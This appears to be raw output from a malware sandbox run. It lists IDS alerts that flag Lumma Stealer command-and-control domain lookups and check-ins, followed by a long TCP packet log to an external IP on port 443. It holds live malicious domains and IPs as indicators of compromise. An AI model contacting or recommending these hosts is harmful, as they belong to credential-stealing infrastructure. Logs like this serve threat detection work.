                                                                                                                                                      2024-10-03T09:16:50.297622+02002056400ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site)1192.168.2.6510961.1.1.153UDP
                                                                                                                                                      2024-10-03T09:16:50.829425+02002056401ET MALWARE Observed Win32/Lumma Stealer Related Domain (mysterisop .site in TLS SNI)1192.168.2.649754104.21.21.3443TCP
                                                                                                                                                      2024-10-03T09:16:51.296261+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649754104.21.21.3443TCP
                                                                                                                                                      2024-10-03T09:16:51.296261+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649754104.21.21.3443TCP
                                                                                                                                                      2024-10-03T09:16:51.323427+02002056394ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site)1192.168.2.6599781.1.1.153UDP
                                                                                                                                                      2024-10-03T09:16:51.879056+02002056395ET MALWARE Observed Win32/Lumma Stealer Related Domain (absorptioniw .site in TLS SNI)1192.168.2.649755104.21.17.174443TCP
                                                                                                                                                      2024-10-03T09:16:52.326685+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649755104.21.17.174443TCP
                                                                                                                                                      2024-10-03T09:16:52.326685+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649755104.21.17.174443TCP
                                                                                                                                                      2024-10-03T09:16:54.882156+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649757104.21.16.12443TCP
                                                                                                                                                      2024-10-03T09:16:54.882156+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649757104.21.16.12443TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                      Oct 3, 2024 09:16:14.319140911 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:14.319170952 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.020281076 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.020361900 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.020392895 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.020421028 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.020610094 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.020627975 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.132426977 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.132483959 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.132566929 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.132968903 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.132985115 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.777064085 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.778101921 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.779067993 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.779082060 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.780994892 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.781002998 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:15.781056881 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:15.781065941 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.124891043 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.124946117 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.125020981 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.125560045 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.125576019 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.559340000 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.559415102 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.559441090 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.559459925 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.559504986 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.560162067 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.570682049 CEST49726443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.570714951 CEST4434972649.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.769330025 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.769527912 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.790394068 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.790424109 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:16.806427002 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:16.806451082 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.188451052 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.188476086 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.188494921 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.188518047 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.188555956 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.188575983 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.188633919 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.218642950 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.218672037 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.218978882 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.219027042 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.219075918 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.286676884 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.286703110 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.287076950 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.287116051 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.287168026 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.313077927 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.313107014 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.313347101 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.313386917 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.313437939 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.353009939 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.353039026 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.353230953 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.353280067 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.353328943 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.381232977 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.381266117 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.381405115 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.381465912 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.381516933 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.401777029 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.401802063 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.401936054 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.401968956 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.402019024 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.415743113 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.415771008 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.415968895 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.415997028 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.416049957 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.432854891 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.432890892 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.433054924 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.433104992 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.433161020 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.449660063 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.449688911 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.449799061 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.449831963 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.449876070 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.463627100 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.463655949 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.463747978 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.463778019 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.463826895 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.479350090 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.479377031 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.479578018 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.479614973 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.479665995 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.494168997 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.494194031 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.494354010 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.494385958 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.494432926 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.503803015 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.503839016 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.503983021 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.504010916 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.504057884 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.513818026 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.513842106 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.513919115 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.513946056 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.513995886 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.521801949 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.521828890 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.521927118 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.521945953 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.522000074 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.539578915 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.539607048 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.539803982 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.539832115 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.539990902 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.541609049 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.541635990 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.894319057 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.894397974 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.894424915 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.894468069 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.912591934 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.912615061 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.912754059 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.912796974 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.912852049 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.928327084 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.928353071 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.928478003 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.928492069 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.928544998 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.936439037 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.936455965 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.936568975 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.936584949 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.936631918 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.946223021 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.946248055 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.946352959 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.946368933 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.946413994 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.959821939 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.959841967 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.959938049 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.959954023 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.960169077 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.964020967 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.964036942 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.964099884 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.964114904 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.964149952 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.971620083 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.971641064 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.971736908 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.971765995 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.971811056 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.981592894 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.981616974 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.981734037 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.981775999 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.981822968 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.999159098 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.999183893 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.999242067 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.999272108 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.999300003 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.999317884 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.016325951 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.016361952 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.016490936 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.016535044 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.016582966 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.023813009 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.023837090 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.023969889 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.024012089 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.024060965 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.033549070 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.033575058 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.033679008 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.033724070 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.033771992 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.046669006 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.046691895 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.046796083 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.046825886 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.046873093 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.050837040 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.050858021 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.050935030 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.050954103 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.051001072 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.058305979 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.058330059 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.058393955 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.058412075 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.058451891 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.068705082 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.068725109 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.068820000 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.068837881 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.068883896 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.086031914 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.086062908 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.086246014 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.086266041 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.086318016 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.102679968 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.102705956 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.102838993 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.102885962 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.102936983 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.110881090 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.110908031 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.111032009 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.111071110 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.111119986 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.120524883 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.120558023 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.120667934 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.120712042 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.120762110 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.133569002 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.133599997 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.133708954 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.133738041 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.133790970 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.144495964 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.144525051 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.144625902 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.144643068 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.144702911 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.145728111 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.145747900 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.145951986 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.145965099 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.146023989 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.155580044 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.155611038 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.155711889 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.155734062 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.155782938 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.173043966 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.173068047 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.173197985 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.173216105 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.542922020 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.542936087 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.542984962 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.542990923 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.543034077 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.561472893 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.561492920 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.561664104 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.561680079 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.561724901 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.571824074 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.571844101 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.571927071 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.571947098 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.571985006 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.588202000 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.588279963 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.588443041 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.588505030 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.588527918 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.588561058 CEST49727443192.168.2.649.12.197.9
